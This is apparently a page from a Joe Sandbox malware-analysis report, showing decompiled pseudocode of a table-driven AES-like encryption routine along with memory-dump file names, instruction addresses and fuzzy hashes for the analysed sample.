					_t586 =  *(0xf1dca40 + (_t772 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t670 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t840 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t671 & 0x000000ff) * 4) ^  *_t1115;
					_t673 =  *(0xf1dc240 + (_t668 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t670 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t772 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t841 & 0x000000ff) * 4) ^ _t1115[1];
					_t1116 =  &(_t1115[4]);
					 *_t1181 = _t1116;
					asm("rol eax, 0x10");
					_t675 = _t673 & 0xffff0000 | _t586 >> 0x00000010;
					_t781 = _t780 >> 0x10;
					_t676 = _t675 >> 0x10;
					_t843 = _t842 >> 0x10;
					_t1128 =  *_t1181;
					_t1129 = _t1181[7];
					 *_t1129 =  *(0xf1dda40 + (_t781 & 0x000000ff) * 4) ^  *(0xf1dd240 + (_t675 & 0x000000ff) * 4) ^  *(0xf1dd640 + (_t842 & 0x000000ff) * 4) ^  *(0xf1dde40 + (_t676 & 0x000000ff) * 4) ^  *_t1128;
					_t1129[1] =  *(0xf1dd240 + (_t673 & 0x000000ff) * 4) ^  *(0xf1dd640 + (_t675 & 0x000000ff) * 4) ^  *(0xf1dde40 + (_t781 & 0x000000ff) * 4) ^  *(0xf1dda40 + (_t843 & 0x000000ff) * 4) ^ _t1128[1];
					_t1129[2] = _t1116[2] ^  *(0xf1dd240 + (_t780 & 0x000000ff) * 4) ^  *(0xf1dd640 + (_t673 & 0x000000ff) * 4) ^  *(0xf1dda40 + (_t586 & 0x000000ff) * 4) ^  *(0xf1dde40 + (_t843 & 0x000000ff) * 4);
					_t1129[3] = _t1116[3] ^  *(0xf1dd240 + (_t842 & 0x000000ff) * 4) ^  *(0xf1dd640 + (_t780 & 0x000000ff) * 4) ^  *(0xf1dde40 + (_t586 & 0x000000ff) * 4) ^  *(0xf1dda40 + (_t676 & 0x000000ff) * 4);
					_t595 = 0;
				} else {
					if(_t851 == 0xc0) {
						L5:
						_t1131 =  &(_t998[4]);
						 *_t1181 = _t1131;
						asm("rol eax, 0x10");
						_t681 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
						_t789 = _t699 >> 0x10;
						_t682 = _t681 >> 0x10;
						_t844 = _t824 >> 0x10;
						_t797 = _t1131[2] ^  *(0xf1dc240 + (_t699 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t628 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t844 & 0x000000ff) * 4);
						_t845 = _t1131[3] ^  *(0xf1dc240 + (_t824 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t699 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t682 & 0x000000ff) * 4);
						_t1143 =  *_t1181;
						_t603 =  *(0xf1dca40 + (_t789 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t681 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t824 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t682 & 0x000000ff) * 4) ^  *_t1143;
						_t684 =  *(0xf1dc240 + (_t628 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t681 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t789 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t844 & 0x000000ff) * 4) ^ _t1143[1];
						_t1144 =  &(_t1143[4]);
						 *_t1181 = _t1144;
						asm("rol eax, 0x10");
						_t686 = _t684 & 0xffff0000 | _t603 >> 0x00000010;
						_t798 = _t797 >> 0x10;
						_t687 = _t686 >> 0x10;
						_t846 = _t845 >> 0x10;
						_t699 = _t1144[2] ^  *(0xf1dc240 + (_t797 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t684 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t603 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t846 & 0x000000ff) * 4);
						_t824 = _t1144[3] ^  *(0xf1dc240 + (_t845 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t797 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t603 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t687 & 0x000000ff) * 4);
						_t998 =  *_t1181;
						_t514 =  *(0xf1dca40 + (_t798 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t686 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t845 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t687 & 0x000000ff) * 4) ^  *_t998;
						_t628 =  *(0xf1dc240 + (_t684 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t686 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t798 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t846 & 0x000000ff) * 4) ^ _t998[1];
						goto L6;
					} else {
						if(_t851 == 0xe0) {
							_t1156 =  &(_t998[4]);
							 *_t1181 = _t1156;
							asm("rol eax, 0x10");
							_t690 = _t628 & 0xffff0000 | _t514 >> 0x00000010;
							_t806 = _t699 >> 0x10;
							_t691 = _t690 >> 0x10;
							_t847 = _t824 >> 0x10;
							_t814 = _t1156[2] ^  *(0xf1dc240 + (_t699 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t628 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t514 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t847 & 0x000000ff) * 4);
							_t848 = _t1156[3] ^  *(0xf1dc240 + (_t824 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t699 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t514 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t691 & 0x000000ff) * 4);
							_t1168 =  *_t1181;
							_t618 =  *(0xf1dca40 + (_t806 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t690 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t824 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t691 & 0x000000ff) * 4) ^  *_t1168;
							_t693 =  *(0xf1dc240 + (_t628 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t690 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t806 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t847 & 0x000000ff) * 4) ^ _t1168[1];
							_t1169 =  &(_t1168[4]);
							 *_t1181 = _t1169;
							asm("rol eax, 0x10");
							_t695 = _t693 & 0xffff0000 | _t618 >> 0x00000010;
							_t815 = _t814 >> 0x10;
							_t696 = _t695 >> 0x10;
							_t849 = _t848 >> 0x10;
							_t699 = _t1169[2] ^  *(0xf1dc240 + (_t814 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t693 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t618 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t849 & 0x000000ff) * 4);
							_t824 = _t1169[3] ^  *(0xf1dc240 + (_t848 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t814 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t618 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t696 & 0x000000ff) * 4);
							_t998 =  *_t1181;
							_t514 =  *(0xf1dca40 + (_t815 & 0x000000ff) * 4) ^  *(0xf1dc240 + (_t695 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t848 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t696 & 0x000000ff) * 4) ^  *_t998;
							_t628 =  *(0xf1dc240 + (_t693 & 0x000000ff) * 4) ^  *(0xf1dc640 + (_t695 & 0x000000ff) * 4) ^  *(0xf1dce40 + (_t815 & 0x000000ff) * 4) ^  *(0xf1dca40 + (_t849 & 0x000000ff) * 4) ^ _t998[1];
							goto L5;
						} else {
							_t595 = 0xffffffff;
						}
					}
				}
				return _t595;
			}

0x0f1d1c23
0x0f1d1c27
0x0f1d1c2b
0x0f1d1c2f
0x0f1d1c33
0x0f1d1c45
0x0f1d1c49
0x0f1d1c50
0x0f1d1c53
0x0f1d1c56
0x0f1d1c59
0x0f1d1c62
0x0f1d1fce
0x0f1d1fce
0x0f1d1fd1
0x0f1d1fda
0x0f1d202c
0x0f1d202e
0x0f1d2063
0x0f1d2066
0x0f1d2093
0x0f1d2095
0x0f1d2097
0x0f1d209a
0x0f1d209d
0x0f1d20a0
0x0f1d20a3
0x0f1d20ac
0x0f1d20fe
0x0f1d2100
0x0f1d2135
0x0f1d2138
0x0f1d2165
0x0f1d2167
0x0f1d2169
0x0f1d216c
0x0f1d216f
0x0f1d2172
0x0f1d2175
0x0f1d217e
0x0f1d21d0
0x0f1d21d2
0x0f1d2207
0x0f1d220a
0x0f1d2237
0x0f1d2239
0x0f1d223b
0x0f1d223e
0x0f1d2241
0x0f1d2244
0x0f1d2247
0x0f1d2250
0x0f1d22a2
0x0f1d22a4
0x0f1d22d9
0x0f1d22dc
0x0f1d2309
0x0f1d230b
0x0f1d230d
0x0f1d2310
0x0f1d2313
0x0f1d2316
0x0f1d2319
0x0f1d2322
0x0f1d2374
0x0f1d2376
0x0f1d23ab
0x0f1d23ae
0x0f1d23db
0x0f1d23dd
0x0f1d23df
0x0f1d23e2
0x0f1d23e5
0x0f1d23e8
0x0f1d23eb
0x0f1d23f4
0x0f1d2446
0x0f1d2448
0x0f1d247d
0x0f1d2480
0x0f1d24ad
0x0f1d24af
0x0f1d24b1
0x0f1d24b4
0x0f1d24b7
0x0f1d24ba
0x0f1d24bd
0x0f1d24c6
0x0f1d2518
0x0f1d251a
0x0f1d254f
0x0f1d2552
0x0f1d257f
0x0f1d2581
0x0f1d2583
0x0f1d2586
0x0f1d2589
0x0f1d258c
0x0f1d258f
0x0f1d2598
0x0f1d25ea
0x0f1d25ec
0x0f1d2621
0x0f1d2624
0x0f1d2651
0x0f1d2653
0x0f1d2655
0x0f1d2658
0x0f1d265b
0x0f1d265e
0x0f1d2661
0x0f1d266a
0x0f1d26bc
0x0f1d26be
0x0f1d26f3
0x0f1d26f6
0x0f1d2723
0x0f1d2725
0x0f1d2727
0x0f1d272a
0x0f1d272d
0x0f1d2730
0x0f1d2733
0x0f1d273c
0x0f1d278e
0x0f1d2790
0x0f1d27c5
0x0f1d27c8
0x0f1d27f5
0x0f1d27fe
0x0f1d2802
0x0f1d2805
0x0f1d2808
0x0f1d280b
0x0f1d280e
0x0f1d1c68
0x0f1d1c6e
0x0f1d1e2a
0x0f1d1e2a
0x0f1d1e2d
0x0f1d1e36
0x0f1d1e88
0x0f1d1e8a
0x0f1d1ebf
0x0f1d1ec2
0x0f1d1eef
0x0f1d1ef1
0x0f1d1ef3
0x0f1d1ef6
0x0f1d1ef9
0x0f1d1efc
0x0f1d1eff
0x0f1d1f08
0x0f1d1f5a
0x0f1d1f5c
0x0f1d1f91
0x0f1d1f94
0x0f1d1fc1
0x0f1d1fc3
0x0f1d1fc5
0x0f1d1fc8
0x0f1d1fcb
0x00000000
0x0f1d1c74
0x0f1d1c7a
0x0f1d1c86
0x0f1d1c89
0x0f1d1c92
0x0f1d1ce4
0x0f1d1ce6
0x0f1d1d1b
0x0f1d1d1e
0x0f1d1d4b
0x0f1d1d4d
0x0f1d1d4f
0x0f1d1d52
0x0f1d1d55
0x0f1d1d58
0x0f1d1d5b
0x0f1d1d64
0x0f1d1db6
0x0f1d1db8
0x0f1d1ded
0x0f1d1df0
0x0f1d1e1d
0x0f1d1e1f
0x0f1d1e21
0x0f1d1e24
0x0f1d1e27
0x00000000
0x0f1d1c7c
0x0f1d1c7c
0x0f1d1c7c
0x0f1d1c7a
0x0f1d1c6e
0x0f1d2823

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581ba01ba875167517cc1e6b024042e8b8328b179d29656521f1e5547140b1bb
Instruction ID: 4a0387a2fcbde1576e760d00c573b108bc95f2fba5deec96fe5e7130a69b5eba
Opcode Fuzzy Hash: 581ba01ba875167517cc1e6b024042e8b8328b179d29656521f1e5547140b1bb
Instruction Fuzzy Hash: 5D721771C172788FDB84EF6EE494036B3B1E744332B47091AAA855B291E634B5B0EBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D1020 Relevance: .7, Instructions: 720
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0F1D1020(signed int* __ebx, signed int* __edi, signed int* __esi) {
				signed int _t513;
				signed char _t515;
				signed char _t516;
				signed char _t518;
				signed char _t520;
				signed char _t521;
				signed char _t523;
				signed char _t525;
				signed char _t526;
				signed char _t528;
				signed char _t530;
				signed char _t531;
				signed char _t533;
				signed char _t535;
				signed char _t536;
				signed char _t538;
				signed char _t540;
				signed char _t541;
				signed char _t543;
				signed char _t545;
				signed char _t546;
				signed char _t548;
				signed char _t550;
				signed char _t551;
				signed char _t553;
				signed char _t555;
				signed char _t556;
				signed char _t558;
				signed char _t560;
				signed char _t561;
				void* _t564;
				signed char _t566;
				signed char _t567;
				signed char _t569;
				signed char _t571;
				signed char _t572;
				signed char _t575;
				signed char _t576;
				signed char _t578;
				signed char _t580;
				signed char _t581;
				signed int _t585;
				signed char _t594;
				signed char _t603;
				signed char _t612;
				signed char _t621;
				signed char _t630;
				signed char _t639;
				signed char _t648;
				signed char _t657;
				signed char _t666;
				signed char _t685;
				signed char _t702;
				signed int _t712;
				signed char _t713;
				signed char _t714;
				signed char _t715;
				signed char _t716;
				signed char _t717;
				signed char _t718;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed char _t722;
				signed char _t723;
				signed char _t724;
				signed char _t725;
				signed char _t726;
				signed char _t727;
				signed char _t728;
				signed char _t729;
				signed char _t730;
				signed char _t731;
				signed char _t732;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed char _t736;
				signed char _t737;
				signed int _t739;
				signed char _t740;
				signed char _t747;
				signed char _t748;
				signed char _t755;
				signed char _t756;
				signed char _t763;
				signed char _t764;
				signed char _t771;
				signed char _t772;
				signed char _t779;
				signed char _t780;
				signed char _t787;
				signed char _t788;
				signed char _t795;
				signed char _t796;
				signed char _t803;
				signed char _t804;
				signed char _t811;
				signed char _t812;
				signed int* _t819;
				signed char _t820;
				signed char _t827;
				signed char _t828;
				signed char _t835;
				signed char _t842;
				signed char _t843;
				signed int _t851;
				signed int* _t924;
				signed int* _t996;
				signed int* _t997;
				signed int* _t998;
				signed int* _t1010;
				signed int* _t1011;
				signed int* _t1023;
				signed int* _t1024;
				signed int* _t1036;
				signed int* _t1037;
				signed int* _t1049;
				signed int* _t1050;
				signed int* _t1062;
				signed int* _t1063;
				signed int* _t1075;
				signed int* _t1076;
				signed int* _t1088;
				signed int* _t1089;
				signed int* _t1101;
				signed int* _t1102;
				signed int* _t1114;
				signed int* _t1115;
				signed int* _t1127;
				signed int* _t1129;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1154;
				signed int* _t1166;
				signed int* _t1167;
				signed int** _t1179;

				_t1179[4] = _t996;
				_t1179[3] = __ebx;
				_t1179[2] = __esi;
				_t1179[1] = __edi;
				_t924 = _t1179[6];
				_t997 = _t1179[8];
				_t851 = _t997[0x3c] & 0x000000ff;
				_t513 =  *_t924 ^  *_t997;
				_t585 = _t924[1] ^ _t997[1];
				_t712 = _t924[2] ^ _t997[2];
				_t739 = _t924[3] ^ _t997[3];
				if(_t851 == 0xa0) {
					L6:
					_t998 =  &(_t997[4]);
					 *_t1179 = _t998;
					asm("rol ebx, 0x10");
					_t515 = _t513 & 0xffff0000 | _t585 >> 0x00000010;
					_t740 = _t739 >> 0x10;
					_t516 = _t515 >> 0x10;
					_t713 = _t712 >> 0x10;
					_t714 = _t998[2] ^  *(0xf1da240 + (_t712 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t739 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t585 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t516 & 0x000000ff) * 4);
					_t747 = _t998[3] ^  *(0xf1da240 + (_t739 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t513 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t585 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t713 & 0x000000ff) * 4);
					_t1010 =  *_t1179;
					_t518 =  *(0xf1da240 + (_t513 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t515 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t740 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t713 & 0x000000ff) * 4) ^  *_t1010;
					_t594 =  *(0xf1daa40 + (_t740 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t712 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t515 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t516 & 0x000000ff) * 4) ^ _t1010[1];
					_t1011 =  &(_t1010[4]);
					 *_t1179 = _t1011;
					asm("rol ebx, 0x10");
					_t520 = _t518 & 0xffff0000 | _t594 >> 0x00000010;
					_t748 = _t747 >> 0x10;
					_t521 = _t520 >> 0x10;
					_t715 = _t714 >> 0x10;
					_t716 = _t1011[2] ^  *(0xf1da240 + (_t714 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t747 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t594 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t521 & 0x000000ff) * 4);
					_t755 = _t1011[3] ^  *(0xf1da240 + (_t747 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t518 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t594 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t715 & 0x000000ff) * 4);
					_t1023 =  *_t1179;
					_t523 =  *(0xf1da240 + (_t518 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t520 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t748 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t715 & 0x000000ff) * 4) ^  *_t1023;
					_t603 =  *(0xf1daa40 + (_t748 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t714 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t520 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t521 & 0x000000ff) * 4) ^ _t1023[1];
					_t1024 =  &(_t1023[4]);
					 *_t1179 = _t1024;
					asm("rol ebx, 0x10");
					_t525 = _t523 & 0xffff0000 | _t603 >> 0x00000010;
					_t756 = _t755 >> 0x10;
					_t526 = _t525 >> 0x10;
					_t717 = _t716 >> 0x10;
					_t718 = _t1024[2] ^  *(0xf1da240 + (_t716 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t755 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t603 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t526 & 0x000000ff) * 4);
					_t763 = _t1024[3] ^  *(0xf1da240 + (_t755 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t523 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t603 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t717 & 0x000000ff) * 4);
					_t1036 =  *_t1179;
					_t528 =  *(0xf1da240 + (_t523 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t525 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t756 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t717 & 0x000000ff) * 4) ^  *_t1036;
					_t612 =  *(0xf1daa40 + (_t756 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t716 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t525 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t526 & 0x000000ff) * 4) ^ _t1036[1];
					_t1037 =  &(_t1036[4]);
					 *_t1179 = _t1037;
					asm("rol ebx, 0x10");
					_t530 = _t528 & 0xffff0000 | _t612 >> 0x00000010;
					_t764 = _t763 >> 0x10;
					_t531 = _t530 >> 0x10;
					_t719 = _t718 >> 0x10;
					_t720 = _t1037[2] ^  *(0xf1da240 + (_t718 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t763 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t612 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t531 & 0x000000ff) * 4);
					_t771 = _t1037[3] ^  *(0xf1da240 + (_t763 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t528 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t612 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t719 & 0x000000ff) * 4);
					_t1049 =  *_t1179;
					_t533 =  *(0xf1da240 + (_t528 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t530 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t764 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t719 & 0x000000ff) * 4) ^  *_t1049;
					_t621 =  *(0xf1daa40 + (_t764 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t718 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t530 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t531 & 0x000000ff) * 4) ^ _t1049[1];
					_t1050 =  &(_t1049[4]);
					 *_t1179 = _t1050;
					asm("rol ebx, 0x10");
					_t535 = _t533 & 0xffff0000 | _t621 >> 0x00000010;
					_t772 = _t771 >> 0x10;
					_t536 = _t535 >> 0x10;
					_t721 = _t720 >> 0x10;
					_t722 = _t1050[2] ^  *(0xf1da240 + (_t720 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t771 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t621 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t536 & 0x000000ff) * 4);
					_t779 = _t1050[3] ^  *(0xf1da240 + (_t771 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t533 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t621 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t721 & 0x000000ff) * 4);
					_t1062 =  *_t1179;
					_t538 =  *(0xf1da240 + (_t533 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t535 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t772 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t721 & 0x000000ff) * 4) ^  *_t1062;
					_t630 =  *(0xf1daa40 + (_t772 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t720 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t535 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t536 & 0x000000ff) * 4) ^ _t1062[1];
					_t1063 =  &(_t1062[4]);
					 *_t1179 = _t1063;
					asm("rol ebx, 0x10");
					_t540 = _t538 & 0xffff0000 | _t630 >> 0x00000010;
					_t780 = _t779 >> 0x10;
					_t541 = _t540 >> 0x10;
					_t723 = _t722 >> 0x10;
					_t724 = _t1063[2] ^  *(0xf1da240 + (_t722 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t779 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t630 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t541 & 0x000000ff) * 4);
					_t787 = _t1063[3] ^  *(0xf1da240 + (_t779 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t538 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t630 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t723 & 0x000000ff) * 4);
					_t1075 =  *_t1179;
					_t543 =  *(0xf1da240 + (_t538 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t540 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t780 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t723 & 0x000000ff) * 4) ^  *_t1075;
					_t639 =  *(0xf1daa40 + (_t780 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t722 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t540 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t541 & 0x000000ff) * 4) ^ _t1075[1];
					_t1076 =  &(_t1075[4]);
					 *_t1179 = _t1076;
					asm("rol ebx, 0x10");
					_t545 = _t543 & 0xffff0000 | _t639 >> 0x00000010;
					_t788 = _t787 >> 0x10;
					_t546 = _t545 >> 0x10;
					_t725 = _t724 >> 0x10;
					_t726 = _t1076[2] ^  *(0xf1da240 + (_t724 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t787 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t639 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t546 & 0x000000ff) * 4);
					_t795 = _t1076[3] ^  *(0xf1da240 + (_t787 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t543 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t639 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t725 & 0x000000ff) * 4);
					_t1088 =  *_t1179;
					_t548 =  *(0xf1da240 + (_t543 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t545 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t788 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t725 & 0x000000ff) * 4) ^  *_t1088;
					_t648 =  *(0xf1daa40 + (_t788 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t724 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t545 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t546 & 0x000000ff) * 4) ^ _t1088[1];
					_t1089 =  &(_t1088[4]);
					 *_t1179 = _t1089;
					asm("rol ebx, 0x10");
					_t550 = _t548 & 0xffff0000 | _t648 >> 0x00000010;
					_t796 = _t795 >> 0x10;
					_t551 = _t550 >> 0x10;
					_t727 = _t726 >> 0x10;
					_t728 = _t1089[2] ^  *(0xf1da240 + (_t726 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t795 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t648 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t551 & 0x000000ff) * 4);
					_t803 = _t1089[3] ^  *(0xf1da240 + (_t795 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t548 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t648 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t727 & 0x000000ff) * 4);
					_t1101 =  *_t1179;
					_t553 =  *(0xf1da240 + (_t548 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t550 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t796 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t727 & 0x000000ff) * 4) ^  *_t1101;
					_t657 =  *(0xf1daa40 + (_t796 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t726 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t550 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t551 & 0x000000ff) * 4) ^ _t1101[1];
					_t1102 =  &(_t1101[4]);
					 *_t1179 = _t1102;
					asm("rol ebx, 0x10");
					_t555 = _t553 & 0xffff0000 | _t657 >> 0x00000010;
					_t804 = _t803 >> 0x10;
					_t556 = _t555 >> 0x10;
					_t729 = _t728 >> 0x10;
					_t730 = _t1102[2] ^  *(0xf1da240 + (_t728 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t803 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t657 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t556 & 0x000000ff) * 4);
					_t811 = _t1102[3] ^  *(0xf1da240 + (_t803 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t553 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t657 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t729 & 0x000000ff) * 4);
					_t1114 =  *_t1179;
					_t558 =  *(0xf1da240 + (_t553 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t555 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t804 & 0x000000ff) * 4) ^  *(0xf1daa40 + (_t729 & 0x000000ff) * 4) ^  *_t1114;
					_t666 =  *(0xf1daa40 + (_t804 & 0x000000ff) * 4) ^  *(0xf1da640 + (_t728 & 0x000000ff) * 4) ^  *(0xf1da240 + (_t555 & 0x000000ff) * 4) ^  *(0xf1dae40 + (_t556 & 0x000000ff) * 4) ^ _t1114[1];
					_t1115 =  &(_t1114[4]);
					 *_t1179 = _t1115;
					asm("rol ebx, 0x10");
					_t560 = _t558 & 0xffff0000 | _t666 >> 0x00000010;
					_t812 = _t811 >> 0x10;
					_t561 = _t560 >> 0x10;
					_t731 = _t730 >> 0x10;
					_t1127 =  *_t1179;
					_t819 = _t1179[7];
					 *_t819 =  *(0xf1db240 + (_t558 & 0x000000ff) * 4) ^  *(0xf1db640 + (_t560 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t812 & 0x000000ff) * 4) ^  *(0xf1dba40 + (_t731 & 0x000000ff) * 4) ^  *_t1127;
					_t819[1] =  *(0xf1dba40 + (_t812 & 0x000000ff) * 4) ^  *(0xf1db640 + (_t730 & 0x000000ff) * 4) ^  *(0xf1db240 + (_t560 & 0x000000ff) * 4) ^  *(0xf1dbe40 + (_t561 & 0x000000ff) * 4) ^ _t1127[1];
